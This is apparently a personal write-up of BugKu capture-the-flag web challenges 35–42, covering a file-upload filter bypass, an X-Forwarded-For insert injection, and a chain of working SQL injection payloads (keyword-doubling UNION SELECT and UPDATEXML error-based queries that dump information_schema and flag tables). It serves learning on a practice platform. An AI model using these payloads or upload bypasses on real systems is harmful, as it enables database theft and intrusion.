CTF-BugKu-WEB-35-41

2020.09.19

go on，今天務必搞定web

經驗教訓

1. 能執行php標籤的副檔名有php4，phtml，phtm，phps，php5等，可以在php被過濾的時候嘗試；
2. html請求頭中，對內容是不區分大小寫識別的，有時候小寫被過濾了，可以試試參雜大寫字母，比如Content-Type: multipart/form-data;被過濾，可以考慮Content-Type: Multipart/form-data;
3. 檔案上傳漏洞中，主要修改三個地方，兩處Content-Type，一處檔名；
4. remote_addr代表客戶端IP，當前配置的輸出結果為最後一個代理伺服器的IP，並不一定是真實客戶端IP；
5. 在沒有特殊配置情況下，X-Forwarded-For請求頭不會自動新增到請求頭中；
6. php中，explode()方法相當於py中的split，用於用標誌分割字串成陣列；
7. 報錯注入一般式子為' OR UPDATEXML(1,CONCAT('~',(database()),'~'),3)OR '，利用的是UPDATEXML第二個引數需要是Xpath格式，用CONCAT連線不是Xpath格式的符號～達到報錯目的，～的ascii碼是0x7e，可以用這個替代前式子中的'~'；
8. insert、delete、update中進行報錯注入的位置是在資料後邊閉合引號新增上邊式子就行了；
9. 如果連結出現了重定向，那麼務必要關注一下訊息頭；
10. 如果a、b兩個值不相同，則異或結果為1。如果a、b兩個值相同，異或結果為0；

第三十五題 細心

https://ctf.bugku.com/challenges#細心

1. 開啟，猛一看還以為這題又不能做呢，原來是自定義的404
   
2. 看到自定義的404，那麼就要想到一個檔案.htaccess，是php的配置檔案，用來自定義404等等其他操作，訪問試試，很好，我們得到了預設的404?
   
3. 題幹提示了txt，那麼就想到robots.txt，同樣的，依舊是php自帶的檔案，用來儲存目錄的好像是，訪問得到線索resusl.php
   
4. 訪問得到下邊介面，看著沒啥用，還好最下邊給了點提示，意思就是請求x的值來等於password唄
   
5. 我隨便試了一個resusl.php?x=admin，萬萬沒想到就進去了，不管給了flagflag(ctf_0098_lkji-s)，還給了所以訪問IP，太狠了?
   

第三十六題 求getshell

https://ctf.bugku.com/challenges#求getshell

1. 開啟是這樣的，難不成是檔案上傳漏洞，啊哈哈，滿足他這個奇怪的要求?
   
2. 你不要php我就不給你嗎？不存在的，上傳一句話php試試，上傳.php檔案不行，於是上傳.php.jpg檔案，被更改了檔名，導致不能正常訪問
   
3. 沒啥思路了，看看wp，學到了遺忘的知識，
4. wp中的做法主要是修改了三個地方，兩處Content-Type，一處檔名，修改的第二處Content-Type和檔名我們都好理解，但是第一處Content-Type我沒明白怎麼回事，我上傳了正兒八經的jpg檔案，Content-Type也是 multipart/form-data;，出題人為啥要過濾這個……還有就是怎麼發現的他存在這個過濾，純靠猜測麼……並且這個題，你只要上傳成功檔案就給了flag，
   
5. flag是KEY{bb35dc123820e}，這題沒搞明白什麼思路……
   

第三十七題 INSERT INTO注入

https://ctf.bugku.com/challenges#INSERT%20INTO注入

1. 開啟連結，看到自己的ip
   
2. 題目中給了原始碼，結合第一步結果進行程式碼審計：

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ //獲取X-Forwarded-For或者Remote_Addr的值
$ip = $_SERVER['HTTP_X_FORWARDED_FOR']; 
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip); // 以,為分割，把ip分割為陣列
return $ip_arr[0]; //返回第一個ip，也就是客戶機ip

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')"; // 注入點，我們可以通過X-Forwarded-For來提供一個假的ip，從而進行注入，這裡沒有任何過濾。
mysql_query($sql);

3. 有了思路，我隨便試了一個ip，還真成了，那麼，insert該怎麼注入呢？
   
4. 一般可以用報錯注入，順便複習了一下報錯注入，報錯注入，一般式子為INSERT INTO table(a,b) VALUES('qwk' OR UPDATEXML(1,CONCAT('~',(database()),'~'),3)OR '')，這個地方不可以使用，因為這個式子包含了逗號，但是原始碼對逗號進行了過濾（用逗號作標誌分割了輸入），有沒有什麼辦法能不用逗號？
5. 原來如此，這個題，沒有報錯，沒有查詢回顯，只能用延時注入，延時注入的一般式子為1’ and if(length(database())=1,sleep(5),1) #，1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1) #，這中間也有逗號，所以，我們要找一個沒有逗號的方法來代替if語句和substr語句。
   • 還有一種判斷執行語句：select case when 判斷條件 then 執行語句1 else 執行語句2 end
   • substr(database() from 1 for 1) = substr(database(),1,1)
   • 方法找到了，那麼接下來就是寫指令碼了，因為是盲注，需要sleep方法，需要大量的請求，所以需要指令碼幫忙，並且這種盲注有兩種方法，一種是二分法，這個方法比較難理解，但是比較快速，還有就是遍歷法（我自己取得名字……），這種比較慢，但是好理解，結果直觀，我打算兩種都試試，畢竟遇見一個好題不容易，哈哈哈，我打算專門寫一個隨筆介紹各種方法，奧力給?
6. 經過測試，我發現這個題好像不能做了，怎麼也得不到結果，是我的問題嗎？直接搬wp也不行，有沒有老鐵也到和我一樣的問題啊……比較全面的wp

第三十八題 這是一個神奇的登陸框

https://ctf.bugku.com/challenges#這是一個神奇的登陸框

1. 又一道404
   

第三十九題 多次

https://ctf.bugku.com/challenges#多次

1. 開啟如下，我發現若存在重定向，那就得好好關注一下這個訊息頭，重定向後的payload是1ndex.php?id=1
   
2. 測試修改id的值，知道id=5時，出現了有用的訊息，所以思路時sql注入
   
3. 接下來開始測試sql injection
   • 1'，輸出錯誤；
   • 1'%23，輸出正確，確實存在sql注入；
   • 1' ORDER BY 1 %23，輸出錯誤，可能存在過濾；
   • 0' ^(1) %23，輸出錯誤；
   • 0' ^(0) %23，輸出正確，說明可以用來測試過濾；
   • 1' ^(length('select')=0) %23，輸出錯誤，說明select被過濾（輸出結果是錯誤說明最終結果是0，1與1異或後為0，所以括號中結果為true，也就是說長度為0，也就是被過濾了）
   • 1' ^(length('selecselectt')=0) %23，輸出正確，說明可以用複寫來繞過！
   • 用以上方法測試了幾個能用得到的SELECT、WHERE、FROM、OR、UNION被過濾掉的有SELECT、OR、UNION
   • 0' UNIOunionN SELECselectT 1,2%23，輸出正確，得到顯示位置；
     
   • 0' UNIOunionN SELECselectT 1,(database()) %23，得到資料庫名web1002-1
     
   • 0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(table_name) FROM infoorrmation_schema.tables WHERE table_schema='web1002-1') %23，得到表名flag1,hint，這裡注意information中有or，所以要進行復寫繞過；
     
   • 0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(column_name) FROM infoorrmation_schema.columns WHERE table_name='flag1') %23，得到表flag1下列名flag1,address；
     
   • 0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(address) FROM flag1) %23，address中發現下一關地址./Once_More.php，flag1表中沒有有用資訊；
     
   • 進入下一關，依舊是id=1，再次進行測試……?
     
   • 經過測試，存在sql注入是沒問題，但是問題是沒有select回顯，所以不能再用上邊的辦法，當然他給了另一種方式，那就是報錯注入，這也是出題人的目的吧?‍♂️正好複習一遍啊哈哈哈
   • 1' AND UPDATEXML(1,(CONCAT('~',(database()),'~')),3)%23，得到資料庫名web1002-2
     
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='web1002-2' ),'~')),3)%23，得到表名class,flag2
     
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag2' ),'~')),3)%23，得到表flag2的列名flag2,address
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(flag2) FROM flag2),'~')),3)%23，得到flag2中內容為flagflag{Bugku-sql_6s-2i-4t-bug}
     
   • 這個flag變成小寫輸入即是答案，你以為到這就完了？當然不是，這個題還有下一關，既然是學習為目的，那麼這次我覺得來做一把?
   • 1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(address) FROM flag2),'~')),3)%23，得到下一關地址./Have_Fun.php，幹就完了?
     
   • 出題人很p，那麼應該就是修改請求頭了
     
   • 新增X-Forwarded-For: 192.168.0.100後，得到一個二維碼，掃一掃得到你……你……你可以看到我? 好吧，我來自於ErWeiMa.php 順便告訴你兩個密碼 one:引數名是game; tow:flag在admin裡 對了,檔案後@…c=Y
     
     
   • &……不做了，沒思路，先看一遍再說吧……

第四十題 PHP_encrypt_1(ISCCCTF)

https://ctf.bugku.com/challenges#PHP_encrypt_1(ISCCCTF)

1. 下載php開啟如下，是個加密演算法，題目中的字串應該就是加密結果，我們的任務就是寫解密演算法然後得出結果?‍♂️

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC'); // 金鑰
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { //把key重複相加成和data一樣長
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) { // 核心演算法，data和key每位ascii相加取餘再ascii得到結果
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str); // base64後輸出
}
?>

2. 那麼我是用php寫解碼方法還是用py呢？哈哈哈

#!/usr/bin/env python 3.8
# -*- encoding: utf-8 -*-
#fileName  : decry.py
#createTime: 2020/09/19 22:10:49
#author    : 喬悟空
#purpose   : 此指令碼用於針對特定加密方式解密
import base64
import hashlib

miwen = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="
miwen = base64.b64decode(miwen).decode()
print(miwen)
key = hashlib.md5('ISCC'.encode()).hexdigest()
print(key)
char = ''
x = 0
for i in range(len(miwen)):
    if x == len(key):
        x = 0
    char += key[x]
    x += 1
print(char)
res = ''
for i in range(len(miwen)):
    for j in range(2):
        tem = 128*j+ord(miwen[i])-ord(char[i])
        if tem<33 or tem ==127:
            pass
        else:
            res += chr(tem)
print(+res)

3. 解密結果，去掉兩個奇怪的字元就是答案Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}
   

第四十一題 檔案包含2

https://ctf.bugku.com/challenges#檔案包含2

1. 奇怪，好像掛了
   

第四十二題 flag.php

https://ctf.bugku.com/challenges#flag.php

1. 明天再做，累了累了……